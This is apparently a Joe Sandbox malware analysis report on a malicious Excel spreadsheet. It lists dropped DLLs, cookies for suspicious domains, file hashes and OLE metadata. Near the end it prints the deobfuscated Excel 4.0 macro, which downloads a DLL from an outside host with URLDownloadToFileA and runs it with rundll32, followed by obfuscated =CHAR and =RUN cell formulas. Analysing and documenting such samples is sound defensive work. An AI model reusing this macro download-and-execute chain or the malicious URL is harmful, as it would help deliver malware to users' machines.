                                                    case (4374).xlsGet hashmaliciousBrowse
                                                      case (166).xlsGet hashmaliciousBrowse
                                                        C:\Users\user\AppData\Roaming\Ubc\way.dllcase (1522).xlsGet hashmaliciousBrowse
                                                          case (4374).xlsGet hashmaliciousBrowse
                                                            case (166).xlsGet hashmaliciousBrowse

                                                              Created / dropped Files

                                                              C:\ProgramData\formnet.dll
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):933888
                                                              Entropy (8bit):6.687983171155114
                                                              Encrypted:false
                                                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                              MD5:B0F3FA047F6AE39A145FD364F693638E
                                                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                              Malicious:true
                                                              Joe Sandbox View:
                                                              • Filename: case (1522).xls, Detection: malicious, Browse
                                                              • Filename: case (4374).xls, Detection: malicious, Browse
                                                              • Filename: case (166).xls, Detection: malicious, Browse
                                                              Reputation:low
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:downloaded
                                                              Size (bytes):933888
                                                              Entropy (8bit):6.687983171155114
                                                              Encrypted:false
                                                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                              MD5:B0F3FA047F6AE39A145FD364F693638E
                                                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                              Malicious:true
                                                              Joe Sandbox View:
                                                              • Filename: case (1522).xls, Detection: malicious, Browse
                                                              • Filename: case (4374).xls, Detection: malicious, Browse
                                                              • Filename: case (166).xls, Detection: malicious, Browse
                                                              Reputation:low
                                                              IE Cache URL:https://rnollg.com/kev/scfrd.dll
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\FDDE0000
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):59780
                                                              Entropy (8bit):7.769791887747964
                                                              Encrypted:false
                                                              SSDEEP:768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQ4:SwmW+aB3viH/WaI5xGVpoWpgv
                                                              MD5:756B1D60127951007258D72EAF5243B3
                                                              SHA1:B6999B2C61B0D5F146A3A9C140B465759CF1A754
                                                              SHA-256:5A9CBA6603DCF58220E2076ABCC1E9889917769BAB73D24EFD54C4F17B309D1F
                                                              SHA-512:50ACC2CF2B1D7750B5F8F19B354E2EA0142F4649F685EA702C4F02C4ED7E017866D1DDC4283CC24F56CE3BF75FBC5CC4230F4406D807CFFBDF7A191B2AE9CB90
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: ..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...*E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a.*.BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 04:34:42 2021, atime=Wed Jan 27 04:34:42 2021, length=8192, window=hide
                                                              Category:dropped
                                                              Size (bytes):867
                                                              Entropy (8bit):4.478468218734738
                                                              Encrypted:false
                                                              SSDEEP:12:85QZn1n4CLgXg/XAlCPCHaXgzB8IB/JovX+WnicvbjbDtZ3YilMMEpxRljKfkcTg:85e4U/XTwz6IYvYebDv3qekwrNru/
                                                              MD5:B5FA6EDF15A44D7B78F7D923AE79E0B0
                                                              SHA1:DCAEEC08A30FC74C486371D75B6146FBE60BBF37
                                                              SHA-256:A019AD5EF24BEB3F34EEDB8F720A148C70979DC5DB441FE2DAAAA27C244D046C
                                                              SHA-512:B24D76FB30A60C22EFFA4333C1AB70D8A47229837966FC0D0AE989D785DD181144CE56A0C022AF0F19244200F39DD5968BB8AE9E0C2B6722B49549D5333ECD60
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: L..................F...........7G..o ..n...o ..n.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....;RV,..Desktop.d......QK.X;RV,*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (4335).LNK
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Jan 27 04:34:42 2021, atime=Wed Jan 27 04:34:42 2021, length=99328, window=hide
                                                              Category:dropped
                                                              Size (bytes):4076
                                                              Entropy (8bit):4.531658040899013
                                                              Encrypted:false
                                                              SSDEEP:96:8Lk/XLIkve3Qh2Lk/XLIkve3Qh2qk/XLIkve3Qh2qk/XLIkve3Q/:8L+IkeQEL+IkeQEq+IkeQEq+IkeQ/
                                                              MD5:7D69374CC0FF7B2AF57099A2C208DC1D
                                                              SHA1:EF7FFA5E9DF8BE113452FDC7CF6A6EB820A59AAF
                                                              SHA-256:F19BA3A3D77B50B19258FCD30A1EAB60098182727A3D74227DE9AC3C8F276429
                                                              SHA-512:14EA976F449A3AB33C33260115254571AD38B8229AF364A98A67F9EA87617A43256B2F7C28492FFE95EE5E88D18751C0C1F362A524E3AEAA81155B29773AA303
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: L..................F.... ...3....{..o ..n......n................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2. d..;RR, .CASE(4~1.XLS..L.......Q.y.Q.y*...8.....................c.a.s.e. .(.4.3.3.5.)...x.l.s.......y...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop\case (4335).xls.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.4.3.3.5.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):176
                                                              Entropy (8bit):4.505329288435076
                                                              Encrypted:false
                                                              SSDEEP:3:oyBVomMEJeIAJmMEJeIAJmMEJeIAJmMEJv:dj6FFFE
                                                              MD5:E523EBFB4AF52DD8C201A2682CB6D5C2
                                                              SHA1:9E524CE9C95F9861591F955E1958970D65C76539
                                                              SHA-256:D9A1347100542AE0ACB17709B30B3E5A3C28AF3254914EB6EBE5504A9612DD24
                                                              SHA-512:63D3E635D56D193BECB55AB8A82A984278167F0FC679A13BC63CB0273B449B0C2B62D8E3771BB8E52111D65FFAD18C2894A79598560B0CCC81C75E3491C76034
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: Desktop.LNK=0..[xls]..case (4335).LNK=0..case (4335).LNK=0..[xls]..case (4335).LNK=0..case (4335).LNK=0..[xls]..case (4335).LNK=0..case (4335).LNK=0..[xls]..case (4335).LNK=0..
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\50PT1LPA.txt
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:ASCII text
                                                              Category:downloaded
                                                              Size (bytes):115
                                                              Entropy (8bit):4.399547545027885
                                                              Encrypted:false
                                                              SSDEEP:3:GmM/ST1TrSVKcvJTSMdl1cSPcHmcgVeUgvX:XM/QNcv4qlVPCgVNg/
                                                              MD5:796C2B6962C518671977FD8F875322E4
                                                              SHA1:E7C8D7EB4238DC963C999B01B640D320E5BCEE97
                                                              SHA-256:CE08B896C90A5D1B3697D179539F689410D6226DA4697F674E21D43C16F7E629
                                                              SHA-512:5CF3C692FE6AE0A0B3224C2B5892B850F7BB22E54F993836F0585A847037643FEA883AB027FA76CF523E2F2E35AEC3AA826AF389815EE75A758FE048C56E7B97
                                                              Malicious:false
                                                              Reputation:low
                                                              IE Cache URL:govemedico.tk/
                                                              Preview: __cfduid.d5b9858d9c1e46ad471504283178ab38f1611693337.govemedico.tk/.9728.3322294912.30870453.3834856829.30864494.*.
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NZ5UXGF8.txt
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:ASCII text
                                                              Category:downloaded
                                                              Size (bytes):119
                                                              Entropy (8bit):4.433531808225311
                                                              Encrypted:false
                                                              SSDEEP:3:GmM/rDSQgavGqSMKNTWY97KJpKfcSNpcHmBx3TgvX:XM/rOBaIMKNKY97v0ODRTg/
                                                              MD5:E56794E70DBCEE6026450D29D29A8978
                                                              SHA1:243ED8813262E2B9FC537243CCCA576CDEB0BCF6
                                                              SHA-256:6CF74E6DB08AE634293BD9A497F5FDE9E67F3FF25E59C01C064C93157D688F73
                                                              SHA-512:5DCABD032E0C2BCE611CF40B6CF154D9056C3A1609838A1358F2FD8C13109F2D64E7990077CDCF2B1DD1558981464B71634108654EEE06A464BDA229C2ED071E
                                                              Malicious:false
                                                              Reputation:low
                                                              IE Cache URL:homesoapmolds.com/
                                                              Preview: __cfduid.d4e49f7596fb660dc86e16cec33016e4c1611693337.homesoapmolds.com/.9728.3322294912.30870453.3828460818.30864494.*.
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\QUXL3DRG.txt
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:ASCII text
                                                              Category:downloaded
                                                              Size (bytes):111
                                                              Entropy (8bit):4.419315168952571
                                                              Encrypted:false
                                                              SSDEEP:3:GmM/GBd8tFuSI552IGT0cSN4q/md0HXvcRRgvX:XM/QdauzrSTqDH/c3g/
                                                              MD5:78C17B26331AE38E3113FF256E212001
                                                              SHA1:F2BDCBEADBCF3841B9799BF831B6168F485EFF7C
                                                              SHA-256:FE197B665D9EE490696887F2446F278C23513AAAAA2F18422CD1375BFDAFCCAD
                                                              SHA-512:6056A6B23AD6AB25FFA5342DC3CC3B23392232BC815DFC0521ECD5B07FF14B6903023F9477CAB7418918F47066222104771AE764A532D867E95B29ACA2628CEA
                                                              Malicious:false
                                                              Reputation:low
                                                              IE Cache URL:rnollg.com/
                                                              Preview: __cfduid.db774c0a7fb6365373fab39efab7d11401611693303.rnollg.com/.9728.2982294912.30870453.494472222.30864494.*.
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y7E8FGKZ.txt
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:ASCII text
                                                              Category:downloaded
                                                              Size (bytes):117
                                                              Entropy (8bit):4.4918088703183905
                                                              Encrypted:false
                                                              SSDEEP:3:GmM/gBPrb6EHInYUZCoCAnw2lSNMXq/mbXn3TgvX:XM/8WuInYU8onweBqgXnjg/
                                                              MD5:7E09D3A0588D75401463087B2C0D8E09
                                                              SHA1:A7B75E9770705361A32DCC13AD806D5DA3A161A3
                                                              SHA-256:22F797BF239CE7F7744C554EF0C1E0B6D1C21C5522EB3FDD193E1A4E75B9819C
                                                              SHA-512:5E23D5620ED9F1DD221FD23B925A43D9F4E17B4D5DE01F19D1D0F2682B725323EED079E6BD4C54D90B5110B6627E8D8DCC66078DAB6D95FDFD4C316C7DBC695B
                                                              Malicious:false
                                                              Reputation:low
                                                              IE Cache URL:gadgetswolf.com/
                                                              Preview: __cfduid.dd17ded6f0d66b400516efab984fbccf71611693336.gadgetswolf.com/.9728.3312294912.30870453.3822376807.30864494.*.
                                                              C:\Users\user\AppData\Roaming\Ubc\way.dll
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):933888
                                                              Entropy (8bit):6.687983171155114
                                                              Encrypted:false
                                                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                              MD5:B0F3FA047F6AE39A145FD364F693638E
                                                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                              Malicious:false
                                                              Joe Sandbox View:
                                                              • Filename: case (1522).xls, Detection: malicious, Browse
                                                              • Filename: case (4374).xls, Detection: malicious, Browse
                                                              • Filename: case (166).xls, Detection: malicious, Browse
                                                              Reputation:low
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\Desktop\0FDE0000
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Applesoft BASIC program data, first line number 16
                                                              Category:dropped
                                                              Size (bytes):173366
                                                              Entropy (8bit):5.331066118802068
                                                              Encrypted:false
                                                              SSDEEP:3072:9xrtdAOtyoVlDGUUlEfblBiPP58Lml9i+aEdDhlQaEdzKp6DxrtdAOtyoVlDGUU7:9xrtdAOtyoVlDGUUlEfblBeP52ml9i+x
                                                              MD5:3FA52813F41144EBCBCB489CB2D5D8EB
                                                              SHA1:BD1996F4AAE5B541C4E792DCABB2A37D7228DB65
                                                              SHA-256:C70F62AC6330A591042A6C85EE24BC8B83376EDC4206B4C8568CB212A900FA6D
                                                              SHA-512:BFE77AC191DF8F9E0B8BBAF87F1CF4490FB22B0C86AA5E3B85907CF63AE5ED8FF86F77F09856389AA68B54FA15451004939823AD64F4D92CD1F11F334F76EE28
                                                              Malicious:false
                                                              Preview: ........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

                                                              Static File Info

                                                              General

                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
                                                              Entropy (8bit):3.8735422234438284
                                                              TrID:
                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                              File name:case (4335).xls
                                                              File size:156704
                                                              MD5:bf86559630b855e4bf2c54d641147b24
                                                              SHA1:182cbac1bdd020fa5fee6ed9d6a50d1071fbe320
                                                              SHA256:31ea3370ca06a2af45514a59a0ae49dc62ac34bc4dce44402f169a9d6fb93853
                                                              SHA512:f188cdd1ae628850d5a48f32ec17d399fdbed68ed6a6e92977374dac61a0d3286f0a2c1ff83ae4b70af219c9f3d7b49aa4ac5125f63f7f75fc6b70a17a4ddc83
                                                              SSDEEP:3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g18:49SUz4tH8vsderSh1yRNJdaAtH8U5B6F
                                                              File Content Preview:........................>.......................0...........................-......./..........................................................................................................................................................................

                                                              File Icon

                                                              Icon Hash:e4eea286a4b4bcb4

                                                              Static OLE Info

                                                              General

                                                              Document Type:OLE
                                                              Number of OLE Files:1

                                                              OLE File "case (4335).xls"

                                                              Indicators

                                                              Has Summary Info:True
                                                              Application Name:Microsoft Excel
                                                              Encrypted Document:False
                                                              Contains Word Document Stream:False
                                                              Contains Workbook/Book Stream:True
                                                              Contains PowerPoint Document Stream:False
                                                              Contains Visio Document Stream:False
                                                              Contains ObjectPool Stream:
                                                              Flash Objects Count:
                                                              Contains VBA Macros:False

                                                              Summary

                                                              Code Page:1251
                                                              Author:
                                                              Last Saved By:
                                                              Last Printed:2021-01-26 16:17:13
                                                              Create Time:2020-04-23 12:26:24
                                                              Last Saved Time:2021-01-26 16:28:15
                                                              Creating Application:Microsoft Excel
                                                              Security:0

                                                              Document Summary

                                                              Document Code Page:1251
                                                              Thumbnail Scaling Desired:False
                                                              Company:
                                                              Contains Dirty Links:False

                                                              Streams

                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                              General
                                                              Stream Path:\x5DocumentSummaryInformation
                                                              File Type:data
                                                              Stream Size:4096
                                                              Entropy:0.843601759481
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00
                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                              General
                                                              Stream Path:\x5SummaryInformation
                                                              File Type:data
                                                              Stream Size:4096
                                                              Entropy:0.362148031008
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00
                                                              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752
                                                              General
                                                              Stream Path:Book
                                                              File Type:Applesoft BASIC program data, first line number 8
                                                              Stream Size:145752
                                                              Entropy:3.94377585798
                                                              Base64 Encoded:True
                                                              Data ASCII:. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
                                                              Data Raw:09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                              Macro 4.0 Code

                                                              CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
                                                              CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)
                                                              
                                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,